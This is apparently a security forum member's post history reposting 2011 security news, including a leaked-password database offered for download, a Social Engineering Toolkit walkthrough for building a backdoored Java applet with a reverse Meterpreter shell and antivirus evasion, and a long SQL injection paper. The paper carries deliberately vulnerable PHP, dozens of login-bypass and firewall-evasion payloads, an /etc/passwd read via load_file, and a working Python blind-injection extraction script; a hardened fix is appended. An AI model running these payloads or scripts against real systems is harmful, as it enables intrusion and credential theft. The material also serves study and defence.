Everything posted by Nytro
-
[h=1]China Software Developer Network (CSDN) 6 Million user data Leaked[/h]
Posted by THN Reporter On 12/21/2011 07:33:00 AM

The "Chinese Software Developer Network" (CSDN), operated by Bailian Midami Digital Technology Co., Ltd., is one of the biggest networks of software developers in China. A text file with 6 million CSDN user records, including user name, password and email, all in clear text, leaked on the internet. The download link (use xunlei to download the file) of the file is available on various social networks. Now Chinese programmers are busy changing their passwords.

Full archive of 104.9 MB (MD5 = b75678048d100600d3a6c648075636a7) available for download now: Here

Just did some data mining on the CSDN leaked user data. Some interesting findings. Here are the results of the top 100 email providers from 6M CSDN user emails:
- @qq.com, 1976190
- @163.com, 1766919
- @126.com, 807893
- @sina.com, 351590
- @yahoo.com.cn, 205487
- @hotmail.com, 202944

Security is important, especially for online services. And NEVER store user passwords in clear text.

Source: China Software Developer Network (CSDN) 6 Million user data Leaked | The Hacker News (THN)
-
[h=1]Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers[/h]
December 22nd, 2011, 14:41 GMT · By Eduard Kovacs

Medium severity vulnerabilities have been found in Kaspersky Anti-Virus and Kaspersky Internet Security 2011/2012 which can allow an attacker to crash the complete software process.

Researchers from Vulnerability Laboratory found a flaw caused by an invalid pointer corruption when processing a corrupt .cfg file through the Kaspersky exception filters. The bug seems to be located in basegui.ppl and basegui.dll when a cfg file import is processed. A proof of concept video was also published along with the disclosure.

“The PoC is not affected by the import exception-handling & gets through without any problems. An invalid pointer write & read allows a local attacker to crash the software via memory corruption. The technic & software to detect the bug in the binary is prv8,” Benjamin Kunz Mejri, Vulnerability Laboratory founder, wrote.

It also seems that a local attacker doesn’t need to know any passwords in order to load the malicious configuration file.

According to the timeline report provided by Vulnerability Labs, Kaspersky was notified of the issue in December 2010 and responded a month later. The information on the vulnerabilities was not disclosed until a few days ago, but there is no mention of the bug being fixed.

A while back, I had the opportunity to chat with Benjamin Kunz Mejri about the security issues they discovered and, at the time, he admitted that not everyone appreciates what they’re doing.

“There are 2 options for the product vendor ... he hates us because he cannot see his own flaws/mistakes/fails ... or he loves us because he can now see his flaws/mistakes/fails. Nothing between. Most vendors reply very friendly & ask us for a disclosure partnership (cooperation) for future bug publications,” he said.

I have contacted Kaspersky to see what they have to say on the matter, so stay tuned for an update.

Source: Kaspersky Anti-Virus and Internet Security 2012 Vulnerable to Hackers - Softpedia
-
[h=1]Untethered jailbreak demonstrated for iOS 5, iOS 5.1[/h]
Dec. 22, 2011 (8:25 am) By: Will Shanklin

Are you itching for that untethered iOS 5 jailbreak that’s just around the corner? Do you like being teased? If so, you’ll want to check out the video that iOS hacker extraordinaire pod2g has posted. As advertised, it’s a jailbreak and it doesn’t require a PC connection after a reboot.

The phone in the video is an iPhone 4, not the iPhone 4S. pod2g has also been working on an iOS 5 jailbreak for the A5-running iPad 2 and iPhone 4S, but they’re farther from release. This jailbreak will be for all iOS 5 devices other than those two. That means the iPhone 4, iPhone 3GS, iPod touch 4th generation, and original iPad will be getting in on the untethered action.

Most developers hate being pestered for release dates, but pod2g has been generous with progress updates. Last week it sounded like the jailbreak was going through its final days of testing, but he’s had more kinks to work out. He now says that it’s nearly ready for prime time, but also asks for patience, saying that there are “some more days to wait.”

An untethered jailbreak for iOS 5 would be a welcome holiday gift for iOS users. The firmware has been around for a couple of months now. Though it has been jailbreakable from the beginning, it’s a tethered jailbreak, requiring you to connect your device to a PC every time you reboot your device. The untethered jailbreak will remove those chains.

As nice as the untethered jailbreak will be, the real prize will be a jailbreak for A5 devices. The iPad 2 and iPhone 4S have thus far proven to be nearly impossible to hack, but pod2g has been making progress on that front too. Last weekend he mentioned that the biggest obstacles were processor cache issues, but he quickly remedied that. The iPhone 4S and iPad 2 jailbreak won’t be released as quickly as the jailbreak in the video, but there’s a good chance pod2g will be releasing it before too long.

via pod2g
Source: Untethered jailbreak demonstrated for iOS 5, iOS 5.1 – Cell Phones & Mobile Device Technology News & Updates | Geek.com
-
[h=2]Cyber attacks in 2012: set targets, cyber warfare, mobile threats[/h]
22 12 2011 15:39 Corina Cailean

What will 2012 bring in terms of information security? Broadly, we should expect not only an extreme increase in targeted attacks against state institutions and large companies, but it is also possible that more and more organizations will be affected by security incidents. In practice, the main target of cyber attackers will be governments and large corporations around the world. For us, as ordinary users, the "Achilles' heel" will be mobile phones, say the Kaspersky Lab experts, who have produced a forecast report for next year.

Alexander Gostev, author of the "Cyberthreat Forecast for 2012" report, says that for now most incidents affect companies and government organizations involved in arms manufacturing, financial operations, or activities related to hi-tech or scientific research. Next year, companies active in fields such as natural resource extraction, energy, transport, food and pharmaceuticals will also be affected. From the "home" user's point of view, it is important to note that the preferred targets will also include companies that provide Internet services, as well as those dealing with information security.

Attacks will be more geographically widespread next year, including Western Europe and the USA, and will affect Eastern Europe, the Middle East and South-East Asia.

Kaspersky Lab experts predict that cybercriminals will change their attack methods to adapt to the competition between IT security companies that investigate this type of attack and offer protection against it. The increased level of attention to security breaches will be another reason attackers will be forced to look for new tools. Conventional attack methods involving e-mail attachments that exploit system vulnerabilities will become increasingly ineffective, while attacks via search engines (influencing the results shown for online searches on certain topics) will be far more popular.

Another prediction concerns attacks by activist hacker groups on state organizations and companies, which will continue in 2012 and will have a predominantly political agenda. However, "hacktivism" could be used as a diversion to hide other types of attack.

Hi-tech malware such as Stuxnet and Duqu, created with state backing, will remain unique phenomena. Their appearance will be decided by international tensions between certain countries, and conflicts in cyberspace will form around the traditional confrontations: the USA and Israel against Iran, and the USA and Western Europe against China. Basic "weapons" built to destroy data at a given moment, such as "kill switches", logic bombs, etc., will become more popular because they are easier to build. The creation of these programs can be outsourced to private contractors used by military or government agencies. In many cases, the contractor may not know what the client's purposes are.

As for mobile phone threats, Kaspersky Lab expects Google Android to be the favourite target of the malicious software market that attacks mobile devices, and the number of attacks exploiting vulnerabilities to grow. The first mobile drive-by attacks and mobile botnets are also forecast to appear. Mobile espionage will spread widely and will most likely include data theft from mobile phones and tracking of certain people via their phones or geolocation services.

Source: Atacuri informatice în 2012: ținte stabilite, război cibernetic, amenințări mobile

PS: It's written by a woman, I haven't read it, but this is roughly what's circulating in the media.
-
[h=1]phpMyAdmin 3.4.9 fixes XSS vulnerabilities[/h]
22 December 2011, 12:10

Version 3.4.9 of phpMyAdmin has been released, closing two security holes in the open source database administration tool. The update fixes vulnerabilities in the phpMyAdmin setup interface and the export panels in the server, database and table sections that could be exploited for cross-site scripting (XSS) attacks. All 3.4.x versions up to and including 3.4.8 are affected – upgrading to 3.4.9 corrects the issues. Alternatively, patches are provided.

The new release also fixes nine other bugs related to navigation, the user interface and the edit functionality. A full list of changes can be found in the release notes and in the project's security advisories.

Version 3.4.9 of phpMyAdmin is available to download from the project's site. Hosted on SourceForge, phpMyAdmin source code is licensed under the GPLv2.

See also:
- XSS in export, a phpMyAdmin security advisory.
- XSS in setup, a phpMyAdmin security advisory.

(crve)

Source: phpMyAdmin 3.4.9 fixes XSS vulnerabilities - The H Open Source: News and Features
-
Hardware Involved Software Attacks
Jeff Forristal, jeff.forristal_@_intel.com

Abstract: Computer security vulnerabilities involving hardware are under-represented within the security industry. With a growing number of attackers, malware, and researchers moving beyond pure software attack scenarios and into scenarios incorporating a hardware element, it is important to start laying a foundation on how to understand, characterize, and defend against these types of hybrid attacks. This paper introduces and details a starting taxonomy of security attacks called hardware involved software attacks, in an effort to further security community awareness of hardware security and its role in upholding the security of the PC platform.

Table of Contents:
- Preface (p. 3)
- PC System Stack: Setting the Stage (p. 3)
  - Focus on the Hardware Layer (p. 5)
  - Forced Migration Down the Stack (p. 6)
- Hardware Background (p. 7)
  - How Hardware Facilitates Security Attacks (p. 8)
  - Obtaining Hardware Access (p. 8)
- Taxonomy of Hardware Involved Software Attacks (p. 9)
  - Inappropriate General Access to Hardware (p. 10)
  - Unexpected Consequences of Specific Hardware Function (p. 11)
  - Hardware Reflected Injection (p. 11)
  - Interference with Hardware Privilege Access Enforcement (p. 13)
  - Access By a Parallel Executing Entity (p. 13)
  - External Control of a Hardware Device (p. 14)
  - Incorrect Hardware Use (p. 14)
- Where to Go From Here (p. 15)
- Appendix A – Publicized Hardware Vulnerabilities (p. 15)
  - CVE List of Hardware Involved Software Vulnerabilities (p. 16)

Download: http://www.forristal.com/material/Forristal_Hardware_Involved_Software_Attacks.pdf
-
[h=2]Backtrack 5: Penetration Testing with Social Engineering Toolkit[/h]

Social engineering attacks are one of the top techniques used against networks today. Why spend days, weeks or even months trying to penetrate layers of network security when you can just trick a user into running a file that allows you full access to their machine and bypasses anti-virus, firewalls and many intrusion detection systems? This is most commonly used in phishing attacks today: craft an e-mail, or create a fake website that tricks users into running a malicious file that creates a backdoor into their system.

But as a security expert, how could you test this against your network? Would such an attack work, and how could you defend against it?

The Backtrack Linux penetration testing platform includes one of the most popular social engineering attack toolkits available. My previous “How-To” on Backtrack 4's SET has been extremely popular. Well, Backtrack 5's SET includes a whole slew of new features and I figured it was time to update the tutorial. We will use SET to create a fake website that offers a backdoored program to any system that connects. So here goes…

Okay, timeout for a disclaimer: This is for security testing purposes only; never attempt to use any security checks or tools on a network that you do not have the authorization and written permission to do so on. Doing so could cost you your job and you could end up in jail.

1. Obtain Backtrack 5 release 1. You can use the LiveCD version, install it on a new system or run it in a Virtual Machine.
2. The first thing you will want to do is update both the Metasploit Framework and the Social Engineering Toolkit to make sure you have the latest version. Update both, restart SET and check for updates one more time.
3. Select number 1, “Social Engineering Attacks”.
4. Next select 2, “Website Attack Vectors”. Notice the other options available.
5. Then 1, “Java Applet Attack Method”. This will create a Java app that has a backdoor shell in it.
6. Next choose 1, “Web Templates” to have SET create a generic webpage to use. Option 2, “Site Cloner”, allows SET to use an existing webpage as a template for the attack webpage.
7. Now choose 1, “Java Required”. Notice the other social media options available.
8. Pick a payload you want delivered. I usually choose 2, “Windows Reverse_TCP Meterpreter”, but you have several to choose from, including your own program. Number 13, “ShellCodeExec Alphanum Shellcode”, is interesting as it runs from memory, never touching the hard drive, thus effectively bypassing most anti-virus programs.
9. Next choose an encoding type to bypass anti-virus. “Shikata_ga_nai” is very popular, Multi-Encoder uses several encoders, but number 16 is best, “Backdoored Executable”. It adds the backdoor program to a legitimate program, like Calc.exe.
10. Set the port to listen on; I just took the default.

Now Backtrack is all set and does several things. It creates the backdoor program, encodes and packs it. It creates the website that you want to use and starts up a listening service looking for people to connect. When done, your screen will look like this:

Okay, we are all set. Now if we go to a “Victim” machine and surf to the IP address of the “attacker” machine we will see this:

If the “Victim” allows this Java script to run, we get a remote session on our attacking machine:

You now have access to the victim's PC. Use “Sessions -i” and the session number to connect to the session. Once connected, you can use Linux commands to browse the remote PC, or running “shell” will give you a remote Windows command shell.

That’s it, one bad choice on the victim’s side and security updates and anti-virus mean nothing. The “Victim” in this case was a fully updated Windows XP Professional with the top name anti-virus internet security suite installed and updated. They can even surf away or close the webpage, because once the shell has connected the web browser is no longer needed. Most attackers will then solidify their hold on the PC and merge the session into another process, effectively making the shell disappear.

This is why informing your users about the dangers of clicking on unknown links in e-mails, suspicious web links, online anti-virus messages and video codec updates is critical. It can be very hazardous to your network. The easiest way to stop this type of attack is to simply run the FireFox add-in “Noscript”; also BitDefender AV 2012 seems very, very resilient against these types of attacks.

Source: https://cyberarms.wordpress.com/2011/12/22/backtrack-5-penetration-testing-with-social-engineering-toolkit/
-
Armitage Hacking Made Easy Part 1
Author: r45c4l
Mail: infosecpirate@gmail.com
Twitter
Greetz and shouts to the entire ICW team and every Indian hacker

Introduction
When I started writing this, I thought to keep it short and simple, as I am assuming that the readers are at least a little bit familiar with Metasploit as well as Armitage. They don't need to know everything, but at least have an idea about the use and purpose of these tools. When I started writing this, I realized that it's really not possible to cover the vast amount of features and the usability of this tool, so I decided to continue this paper as a series. I hope to finish this in part 2 of this paper, but again it depends on the demands and requests of the readers if they want to add or go into the detail of any of the topics or functions of this beautiful tool “Armitage”. There must be some mistakes, so I request readers to please let me know about those mistakes so that I can correct them and give them better stuff. My contact details are mentioned above.

Download: http://www.exploit-db.com/download_pdf/18255
-
[h=1]False SQL Injection and Advanced Blind SQL Injection[/h]
[code]
#########################################################################
# Exploit Title: False SQL injection and advanced blind SQL injection
# Date: 21/12/2011
# Author: wh1ant
# Company: trinitysoft
# Group: secuholic
#########################################################################
[/code]

This document is written to publicize a new SQL injection method for bypassing some web firewalls or security solutions. I tested it on a web firewall made in Korea; most SQL injection attacks were hit. I will not reveal the maker, to limit its damage. In order to read this document, you have to understand basic MySQL principles.

I classify the term "SQL Injection" with 2 meanings. The first is general SQL Injection, which we usually call "True SQL Injection", and the second is "False SQL Injection". Through this document you can also learn something special about "True SQL Injection". And I mean to say that my method (False SQL Injection) is different from the True/False SQL Injection mentioned in "Blind SQL Injection".

The tested environment was as follows:
- ubuntu server 11.04
- mysql 5.1.54-1
- Apache 2.2.17
- PHP 5.3.5-1

The tested code was as follows.
[code]
<?php
/*
create database injection_db;
use injection_db;
create table users(num int not null, id varchar(30) not null, password varchar(30) not null, primary key(num));
insert into users values(1, 'admin', 'ad1234');
insert into users values(2, 'wh1ant', 'wh1234');
insert into users values(3, 'secuholic', 'se1234');

*** login.php ***
*/
if(empty($_GET['id']) || empty($_GET['password'])){
    echo "<html>";
    echo "<body>";
    echo "<form name='text' action='login.php' method='get'>";
    echo "<h4>ID <input type='text' name='id'><br>";
    echo "PASS<input type='password' name='password'><br></h4>";
    echo "<input type='submit' value='Login'>";
    echo "</form>";
    echo "</body>";
    echo "</html>";
}
else{
    $id = $_GET['id'];
    $password = $_GET['password'];
    $dbhost = 'localhost';
    $dbuser = 'root';
    $dbpass = 'pass';
    $database = 'injection_db';
    $db = mysql_connect($dbhost, $dbuser, $dbpass);
    mysql_select_db($database, $db);
    // Deliberately vulnerable test code: the raw id and password are
    // concatenated into the query text, which is what the payloads below target.
    $sql = mysql_query("select * from users where id='$id' and password='$password'") or die (mysql_error());
    $row = mysql_fetch_array($sql);
    if($row['id'] && $row['password']){
        echo "<font color=#FF0000><h1>"."Login success"."</h1></u><br>";
        echo "<h3><font color=#000000>"."Hello, "."</u>";
        echo "<font color=#D2691E>".$row['id']."</u></h3><br>";
    }
    else{
        echo "<script>alert('Login failed');</script>";
    }
    mysql_close($db);
}
?>
[/code]

First, basic SQL Injection is as follows:
' or 1=1#

The code above is the general SQL Injection code, and this writer classifies it as "True SQL Injection". When you log on to some site, inside the web program your id and password are checked by a statement like "select id, password from table where id='' and password=''". You can easily understand this when you think of the empty string between single quotation marks as 0. An empty string is the same as 0, so the attack is possible using = and 0. As a result, the following statement makes the log on process succeed:
'=0#

We can apply it in different ways.
This is possible because 0 > -1:
'>-1#

Also, this is possible because 0 < 1:
'<1#

You don't have to use only single digits. You can attack with two digits as follows:
1'<99#

The comparison 0=1 evaluates to 0, and the following operation is true because of id=''=0 (0=1):
'=0=1#

Additionally, there are comparison operations that yield the same value as each other:
'<=>0#

Like this, if you use comparison operations, you can attack in additional ways:
'=0=1=1=1=1=1#
'=1<>1#
'<>1#
1'<>99999#
'!=2!=3!=4#

Now you get to understand False SQL injection. The following is not an attack but an operation in MySQL:
[code]
mysql> select * from users;
+-----+-----------+----------+
| num | id        | password |
+-----+-----------+----------+
|   1 | admin     | ad1234   |
|   2 | wh1ant    | wh1234   |
|   3 | secuholic | se1234   |
+-----+-----------+----------+
3 rows in set (0.01 sec)
[/code]

This shows the contents of the table without any problem. The following is the result when you don't input any value for the id:
[code]
mysql> select * from users where id='';
Empty set (0.00 sec)
[/code]

Of course there is no result, because no id field contains that empty string. In truth, I have seen that in MySQL, if a string field is compared with 0, the result is true. Based on that, the following statement is true:
[code]
mysql> select * from users where id=0;
+-----+-----------+----------+
| num | id        | password |
+-----+-----------+----------+
|   1 | admin     | ad1234   |
|   2 | wh1ant    | wh1234   |
|   3 | secuholic | se1234   |
+-----+-----------+----------+
3 rows in set (0.00 sec)
[/code]

If you input 0 for the id, all the content is shown. This is the basis of "False SQL Injection". After all, a result of 0 makes the log on process succeed. To make the result 0, you need something that processes integers; for that you can use bitwise operations and arithmetic operations. First I'll show a bitwise operation example. The bitwise OR operation is well known to any programmer. And as I told you before, '' is 0, so if you compute "0 bitwise OR 0", the result is 0.
So the following operation succeeds in logging on as a False SQL Injection:
'|0#

Naturally, you can use the AND operation:
'&0#

This is the attack using XOR:
'^0#

Also, using shift operations is possible:
'<<0#
'>>0#

If you apply bitwise operations like those, you can use various attack methods:
'&''#
'%11&1#
'&1&1#
'|0&1#
'<<0|0#
'<<0>>0#

Now I will show "False SQL Injection" using arithmetic operations. If the result of an arithmetic operation with '' is 0, the attack will succeed. The following are examples using arithmetic operations:
'*9# (Multiplication)
'/9# (Division)
'%9# (Mod)
'+0# (Addition)
'-0# (Subtraction)

The significant point is that the result has to be under one. You can also attack as follows:
'+2+5-7#
'+0+0-0#
'-0-0-0-0-0#
'*9*8*7*6*5#
'/2/3/4#
'%12%34%56%78#
'/**/+/**/0#
'-----0#
'+++0+++++0*0#

The next attack uses functions. In this document, I can't show all the functions. Because this attack is not difficult, you can use the "True, False SQL Injection" attack with as many functions as you want. And whether this attack is "True SQL Injection" or "False SQL Injection" is decided by the last operation after the function returns:
'<hex(1)#
'=left(0x30,1)#
'=right(0,1)#
'!=curdate()#
'-reverse(0)#
'=ltrim(0)#
'<abs(1)#
'*round(1,1)#
'&left(0,0)#
'*round(0,1)*round(0,1)#

Also, you can attack using a space in the function name. But you are able to use the space with only some functions:
'=upper (0)#

Next is the SQL keyword method. This method is also decided as True or False Injection according to the case:
' <1 and 1#
'xor 1#
'div 1#
'is not null#
admin' order by'
admin' group by'
'like 0#
'between 1 and 1#
'regexp 1#

Inputting the id or password in the field without a comment is also possible for True, False SQL Injection. Normal web firewalls filter #, --, /**/, so this method is more effective against web firewalls.
- ID: '=' PASS: '='
- ID: '<>'1 PASS: '<>'1
- ID: '>1=' PASS: '>1='
- ID: 0'='0 PASS: 0'='0
- ID: '<1 and 1>' PASS: '<1 and 1>'
- ID: '<>ifnull(1,2)='1 PASS: '<>ifnull(1,2)='1
- ID: '=round(0,1)='1 PASS: '=round(0,1)='1
- ID: '*0*' PASS: '*0*'
- ID: '+' PASS: '+'
- ID: '-' PASS: '-'
- ID: '+1-1-' PASS: '+1-1-'

All attacks used in this document will be more effective using brackets when bypassing a web firewall:
'+(0-0)#
'=0<>((reverse(1))-(reverse(1)))#
'<(8*7)*(6*5)*(4*3)#
'&(1+1)-2#
'>(0-100)#

Let's see a normal SQL Injection attack:
' or 1=1#

If this is translated into hexadecimal, the result is as follows:
http://127.0.0.1/login.php?id=%27%20%6f%72%20%31%3d%31%23&password=1234

An attack like the above is basically filtered. So that's not a good attack; I will try to bypass the filtering using tab (%09) standing in for space (%20). In truth, you can use %a0 instead of %09. The possible values are as follows:
%09
%0a
%0b
%0c
%0d
%a0
%23%0a
%23%48%65%6c%6c%6f%20%77%6f%6c%72%64%0a

The following is the example using %a0 instead of %20:
http://127.0.0.1/login.php?id=%27%a0%6f%72%a0%31%3d%31%23&password=1234

Now I will show a "Blind SQL injection" attack. This attack can't bypass web firewall filtering, but some attackers tend to think that a Blind SQL Injection attack is impossible on a log on page. So I decided to show this subject. The following attack code can be used on the log on page, and the page will show the id and password:
'union select 1,group_concat(password),3 from users#

This attack code brings back /etc/passwd information:
'union select 1,load_file(0x2f6574632f706173737764),3 from users#

I dare say that, even without a union select statement, Blind SQL injection using the and operation is possible. The number of records is three:
admin' and (select count(*) from users)=3#

Let's attack, bypassing the web firewall, using Blind SQL Injection. The following is code vulnerable to Blind SQL Injection.
[code]
<?php
/*** info.php ***/
$n = $_GET['num'];
if(empty($n)){
    $n = 1;
}
$dbhost = 'localhost';
$dbuser = 'root';
$dbpass = 'root';
$database = 'injection_db';
$db = mysql_connect($dbhost, $dbuser, $dbpass);   // original passed an undefined $host here
mysql_select_db($database, $db);
// Deliberately vulnerable test code: num is concatenated unquoted into the query.
$sql = mysql_query("select * from `users` where num=".$n) or die (mysql_error());
$info = @mysql_fetch_row($sql);
echo "<body bgcolor=#000000>";
echo "<h1><font color=#FFFFFF>wh1ant</font>";
echo "<font color=#2BF70E> site for blind SQL injection test</h1><br>";
echo "<h1><font color=#2BF70E>num: </font><font color=#D2691E>".$info[0]."</font></h1>";
echo "<h1><font color=#2BF70E>user: </font><font color=#D2691E>".$info[1]."</font>";
echo "</body>";
mysql_close($db);
?>
[/code]

Basic Blind SQL Injection on a page like the above is as follows:
http://127.0.0.1/info.php?num=1 and 1=0
http://127.0.0.1/info.php?num=1 and 1=1

But using the = operation is also possible for Blind SQL Injection:
http://192.168.137.129/info.php?num=1=0
http://192.168.137.129/info.php?num=1=1

Also, other operations are naturally possible:
http://127.0.0.1/info.php?num=1<>0
http://127.0.0.1/info.php?num=1<>1
http://127.0.0.1/info.php?num=1<0
http://127.0.0.1/info.php?num=1<1
http://127.0.0.1/info.php?num=1*0*0*1
http://127.0.0.1/info.php?num=1*0*0*0
http://127.0.0.1/info.php?num=1%1%1%0
http://127.0.0.1/info.php?num=1%1%1%1
http://127.0.0.1/info.php?num=1 div 0
http://127.0.0.1/info.php?num=1 div 1
http://127.0.0.1/info.php?num=1 regexp 0
http://127.0.0.1/info.php?num=1 regexp 1
http://127.0.0.1/info.php?num=1^0
http://127.0.0.1/info.php?num=1^1

Attack examples:
http://127.0.0.1/info.php?num=0^(locate(0x61,(select id from users where num=1),1)=1)
http://127.0.0.1/info.php?num=0^(select position(0x61 in (select id from users where num=1))=1)
http://127.0.0.1/info.php?num=0^(reverse(reverse((select id from users where num=1)))=0x61646d696e)
http://127.0.0.1/info.php?num=0^(lcase((select id from users where num=1))=0x61646d696e)
http://127.0.0.1/info.php?num=0^((select id from users where num=1)=0x61646d696e)
http://127.0.0.1/info.php?num=0^(id regexp 0x61646d696e)
http://127.0.0.1/info.php?num=0^(id=0x61646d696e)
http://127.0.0.1/info.php?num=0^((select octet_length(id) from users where num=1)=5)
http://127.0.0.1/info.php?num=0^((select character_length(id) from users where num=1)=5)

If I were to show every attack, it would take too much time, so I stop here. Blind SQL Injection is difficult to do manually, so using a tool will be more effective. I will show a tool made in Python; this is an example using the ^ (XOR) bitwise operation. To make the most of bypassing the web firewall, I replaced the space with %0a.
[code]
#!/usr/bin/python
### blind.py ###
import urllib
import sys
import os

def put_data(true_url, true_result, field, index, length):
    for i in range(1, length+1):
        for j in range(32, 127):
            attack_url = true_url + "^(%%a0locate%%a0%%a0(0x%x,(%%a0select%%a0%s%%a0%%a0from%%a0%%a0users%%a0where%%a0num=%d),%d)=%d)" % (j, field, index, i, i)
            attack_open = urllib.urlopen(attack_url)
            attack_result = attack_open.read()
            attack_open.close()
            if attack_result == true_result:
                ch = "%c" % j
                sys.stdout.write(ch)
                break
    print "\t\t",

def get_length(false_url, false_result, field, index):
    i = 0
    while 1:
        data_length_url = false_url + "^(%%a0(select%%a0octet_length%%a0%%a0(%s)%%a0from%%a0users%%a0where%%a0num%%a0=%%a0%d)%%a0=%%a0%d)" % (field, index, i)
        data_length_open = urllib.urlopen(data_length_url)
        data_length_result = data_length_open.read()
        data_length_open.close()
        if data_length_result == false_result:
            return i
        i += 1

url = "http://127.0.0.1/info.php"
true_url = url + "?num=1"
true_open = urllib.urlopen(true_url)
true_result = true_open.read()
true_open.close()
false_url = url + "?num=0"
false_open = urllib.urlopen(false_url)
false_result = false_open.read()
false_open.close()
print "num\t\tid\t\tpassword"
fields = "num", "id", "password"
for i in range(1, 4):
    for j in range(0, 3):
        length = get_length(false_url, false_result, fields[j], i)
        length = put_data(false_url, true_result, fields[j], i, length)
    print ""
[/code]

Regrettably, the attack test was stopped for lack of time; if anyone other than this writer studies these attack codes further, it will be easy for them to develop the attack.

# Korean document: http://wh1ant.kr/archives/[Hangul]%20False%20SQL%20injection%20and%20Advanced%20blind%20SQL%20injection.txt
[EOF]

Source: Vulnerability analysis, Security Papers, Exploit Tutorials
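Every payload in the paper above works because the login page splices raw input into query text and MySQL then coerces '' to 0. A hardened counterpart to that login.php, added here as an example (not wh1ant's code), shows the fix that makes the whole operator/whitespace catalogue irrelevant: bind the values as parameters and compare against a stored password hash. It assumes a users table with a password_hash column written by password_hash() in place of the cleartext password column, a low-privilege database account named login_app with a placeholder password, and a form that submits with POST rather than GET so credentials stay out of URL logs.

```php
<?php
// login_hardened.php: added example, not part of the original paper.
// Same login flow as the test page, but the user-supplied id and password never
// reach the SQL parser as query text, so '=0#, '|0#, ' or 1=1# and the %a0 / %09
// whitespace variants are compared as literal strings against the id column and
// match nothing.
//
// Assumptions (not from the original): users has a password_hash VARCHAR(255)
// column filled by password_hash(); the DB account is the low-privilege user
// login_app; the form posts its fields instead of sending them in the URL.

$id       = $_POST['id'] ?? '';
$password = $_POST['password'] ?? '';

if ($id === '' || $password === '') {
    http_response_code(400);
    exit('id and password are required');
}

// Throw on driver errors instead of silently continuing with a broken handle.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$mysqli = new mysqli('localhost', 'login_app', 'APP_PASSWORD_PLACEHOLDER', 'injection_db');
$mysqli->set_charset('utf8mb4');

// The placeholder is bound by the driver; MySQL never sees attacker-chosen
// operators as SQL, so the ''=0 coercion has nothing to act on.
$stmt = $mysqli->prepare('SELECT id, password_hash FROM users WHERE id = ? LIMIT 1');
$stmt->bind_param('s', $id);
$stmt->execute();
$stmt->bind_result($dbId, $hash);
$found = $stmt->fetch();
$stmt->close();

// Verify against the stored hash. One message for both "no such user" and
// "wrong password" avoids confirming which ids exist.
if ($found && password_verify($password, $hash)) {
    echo '<h1>Login success</h1><p>Hello, '
       . htmlspecialchars($dbId, ENT_QUOTES, 'UTF-8') . '</p>';
} else {
    echo '<p>Login failed</p>';
}
$mysqli->close();
```

The same change applies to info.php: bind num as an integer parameter ('i' in bind_param) and the 0^(...) probes stop being evaluated as SQL.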
-
Holy shit, don't make a mockery of this category.
-
What the fuck kind of "tutorials" are these? Stop posting all this crap.
-
[h=1]30 Best Sources For Linux / *BSD / Unix Documentation On the Web[/h]by Vivek Gite on December 21, 2011 Man pages are written by sys-admin and developers for IT techs, and are intended more as a reference than as a how to. Man pages are very useful for people who are already familiar with Linux, Unix, and BSD operating systems. Use man pages when you just need to know the syntax for particular commands or configuration file, but they are not helpful for new Linux users. Man pages are not good for learning something new for the first time. Here are thirty best documentation sites on the web. Link: http://www.cyberciti.biz/tips/linux-unix-bsd-documentations.html
-
Change the 10-post limit for posting in the Help section
Nytro replied to crs12decoder's topic in Sugestii
How many received a warning or a ban because they posted there without having 10 posts? Maybe 2-3 who came with idiotic questions and requests. Probably only a few warnings were handed out for that, depending on the post in question. We don't hold strictly to that rule, but in the end it is useful. Why should everyone be a leecher and contribute nothing? First of all, one can introduce oneself; from that we get an idea about the person in question and might even tolerate a stupid request. Then, anyone can post an IT news item or something useful. -
[h=1]Probably the Best Free Security List in the World[/h]Updated 21. December 2011 - 4:27 by ako
1. Introduction / Keys / What's New
2. Realtime Protection
3. Scanners
4. Virus Removal Tools
5. Online Scanners
6. Firewalls
7. HIPS
8. System Hardening-HIPS
9. System Hardening
10. Sandboxing / Virtualization
11. Vulnerability Scanning
12. Browser Security
13. IP-Blocking/Hardening
14. Privacy
15. System Monitoring
16. Network Traffic Monitoring
17. System Cleaning
18. Data Rescue
19. Encrypting
20. Backup
21. System Rescue
22. Miscellaneous
23. Tests & Analysis Tools
24. Vista/Windows 7 Security
25. My Choices and More
Link: http://www.techsupportalert.com/content/probably-best-free-security-list-world.htm
-
-
ExploitHub is the first legitimate marketplace for validated, non-zero-day exploits Link: https://www.exploithub.com/
-
[h=4]Securitytube Metasploit Framework Expert ( Armitage )[/h] Description: This video, part of the SecurityTube Metasploit Framework Expert series, introduces Armitage. You'll learn the basic use of Armitage and see a demonstration. This video also covers some of the advanced features: dynamic workspaces, team collaboration, and reporting. Sursa: Securitytube Metasploit Framework Expert ( Armitage ) Yes, a tutorial about Armitage...
-
[h=4]Execute Binary In The Alternate Data Stream[/h]A simple and possibly useful trick. Description: Since Vista the start command is forbidden for ADS. Here is a workaround. Sursa: Execute Binary In The Alternate Data Stream
-
[h=4]How Not To Implement Cryptography For The Owasp Top 10[/h] Description: How NOT to Implement Cryptography for the OWASP Top 10 (Reloaded) with Anthony J. Stieber Sursa: How Not To Implement Cryptography For The Owasp Top 10
-
Backdoor in Android for No-Permissions Reverse Shell Security expert Thomas Cannon working at viaForensics as the Director of R&D has demonstrated a custom-developed app that installs a backdoor in Android smartphones – without requiring any permissions or exploiting any security holes. Thomas built an app which requires no permissions and yet is able to give an attacker a remote shell and allow them to execute commands on the device remotely from anywhere in the world. The functionality they are exploiting to do this is not new, it has been quietly pointed out for a number of years, and was explained in depth at Defcon 18. It is not a zero-day exploit or a root exploit. They are using Android the way it was designed to work, but in a clever way in order to establish a 2-way communication channel. This has been tested on Android versions ranging from 1.5 up to 4.0 Ice Cream Sandwich, and it works in a similar way on all platforms. The application operates by instructing the browser to access a particular web page with specific parameters. This web page, and the server behind it, will, in turn, control the app by forwarding the browser to a URL that starts with a protocol prefix that is registered as being handled by the app, for example app://. This process can then be repeated and in doing so it enables two-way communication. "In this demonstration Android’s power and flexibility were perhaps also its downfall. Other smartphone platforms may not offer the controls we are bypassing at all, and the multi-tasking capabilities in Android allowed us to run the attack almost transparently to the user. This power combined with the open nature of Android also facilitates the customisation of the system to meet bespoke security requirements. This is something we have even been involved in ourselves by implementing a proof of concept Loadable Kernel Module to pro-actively monitor and defend a client’s intellectual property as it passed through their devices. 
It is no surprise that we have seen adoption of Android research projects in the military and government as it can be enhanced and adapted for specific security requirements, perhaps like no other mobile platform before it." Thomas Cannon said. Sursa: Backdoor in Android for No-Permissions Reverse Shell | The Hacker News (THN)
-
CSS - The sexy assassin
